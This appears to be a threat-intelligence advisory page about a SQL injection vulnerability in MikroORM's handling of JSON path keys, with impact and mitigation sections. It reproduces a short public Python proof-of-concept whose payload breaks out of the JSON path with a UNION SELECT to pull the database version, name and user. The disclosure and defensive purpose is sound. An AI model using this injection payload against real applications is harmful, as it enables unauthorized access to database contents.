MikroORM 7.0.13 - SQL Injection
MikroORM versions @mikro-orm/knex <= 6. 6. 13 and @mikro-orm/sql <= 7. 0. 13 contain a SQL injection vulnerability. This occurs because MikroORM does not properly escape runtime-controlled JSON path keys when constructing JSON_EXTRACT queries. An attacker can exploit this flaw by injecting crafted JSON-path keys to break out of the JSON path context and execute arbitrary SQL commands, including UNION SELECT statements to extract database information. Exploit code is publicly available in Python demonstrating this attack. No official patch or fix status is provided in the available data.
AI Analysis
Technical Summary
The vulnerability identified as CVE-2026-44680 affects MikroORM versions @mikro-orm/knex up to 6.6.13 and @mikro-orm/sql up to 7.0.13. It arises from improper escaping of user-controlled JSON path keys in JSON_EXTRACT queries, allowing attackers to inject arbitrary SQL. The affected API pattern involves the em.find method where JSON column keys are controlled by user input. Exploitation enables execution of UNION SELECT statements to retrieve sensitive database information. The exploit has been demonstrated on a platform using Docker, Debian Bookworm, Node.js 18, and MariaDB 10.x. Public exploit code is available in Python.
Potential Impact
Successful exploitation allows an attacker to perform SQL injection via crafted JSON path keys, potentially leading to unauthorized disclosure of database information such as database version, current database name, database user, and version comments. This can compromise confidentiality of the database contents. There is no indication of known exploits in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory at https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp for current remediation guidance. Until an official fix is available, avoid using affected versions or implement strict input validation and sanitization on JSON path keys if possible. Monitor vendor communications for updates.
Indicators of Compromise
- exploit-code: # Exploit Title: MikroORM 7.0.13 - SQL Injection # Google Dork: N/A # Date: 2026-05-27 # Exploit Author: cardosource # Vendor Homepage: https://mikro-orm.io/ # Software Link: https://github.com/mikro-orm/mikro-orm # Version: @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13 # Tested on: Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x # CVE: CVE-2026-44680 # Advisory: https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp """ Description: The vulnerability exists because MikroORM fails to properly escape runtime-controlled JSON path keys when building JSON_EXTRACT queries. The attacker can break out of the JSON path context and inject arbitrary SQL. Affected API pattern: em.find(Entity, { jsonColumn: { [userControlledKey]: value } }) By injecting crafted JSON-path keys, it becomes possible to execute UNION SELECT statements and extract arbitrary database information. """ import requests import json url = "http://localhost:3000/api/users/search" payload = { "filterField": "$.x' ) OR 1=1 UNION SELECT @@version, DATABASE(), USER(), @@version_comment -- ", "filterValue": "x" } headers = { "Content-Type": "application/json" } response = requests.post(url, json=payload, headers=headers) print(f"Status: {response.status_code}") print(json.dumps(response.json(), indent=2))
MikroORM 7.0.13 - SQL Injection
Description
MikroORM versions @mikro-orm/knex <= 6. 6. 13 and @mikro-orm/sql <= 7. 0. 13 contain a SQL injection vulnerability. This occurs because MikroORM does not properly escape runtime-controlled JSON path keys when constructing JSON_EXTRACT queries. An attacker can exploit this flaw by injecting crafted JSON-path keys to break out of the JSON path context and execute arbitrary SQL commands, including UNION SELECT statements to extract database information. Exploit code is publicly available in Python demonstrating this attack. No official patch or fix status is provided in the available data.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The vulnerability identified as CVE-2026-44680 affects MikroORM versions @mikro-orm/knex up to 6.6.13 and @mikro-orm/sql up to 7.0.13. It arises from improper escaping of user-controlled JSON path keys in JSON_EXTRACT queries, allowing attackers to inject arbitrary SQL. The affected API pattern involves the em.find method where JSON column keys are controlled by user input. Exploitation enables execution of UNION SELECT statements to retrieve sensitive database information. The exploit has been demonstrated on a platform using Docker, Debian Bookworm, Node.js 18, and MariaDB 10.x. Public exploit code is available in Python.
Potential Impact
Successful exploitation allows an attacker to perform SQL injection via crafted JSON path keys, potentially leading to unauthorized disclosure of database information such as database version, current database name, database user, and version comments. This can compromise confidentiality of the database contents. There is no indication of known exploits in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory at https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp for current remediation guidance. Until an official fix is available, avoid using affected versions or implement strict input validation and sanitization on JSON path keys if possible. Monitor vendor communications for updates.
Technical Details
- Cve
- CVE-2026-44680
- Version
- @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13
- Vendor
- https://mikro-orm.io
- Application
- https://github.com/mikro-orm/mikro-orm
- Author
- cardosource
- Platform
- Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x
- Edb Id
- 52600
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for MikroORM 7.0.13 - SQL Injection
# Exploit Title: MikroORM 7.0.13 - SQL Injection # Google Dork: N/A # Date: 2026-05-27 # Exploit Author: cardosource # Vendor Homepage: https://mikro-orm.io/ # Software Link: https://github.com/mikro-orm/mikro-orm # Version: @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13 # Tested on: Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x # CVE: CVE-2026-44680 # Advisory: https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp """ Description: The vulnerability exis... (859 more characters)
Threat ID: 6a1a0debe29bf47b5017f5ae
Added to database: 5/29/2026, 10:06:35 PM
Last enriched: 5/29/2026, 10:06:41 PM
Last updated: 5/29/2026, 11:27:19 PM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.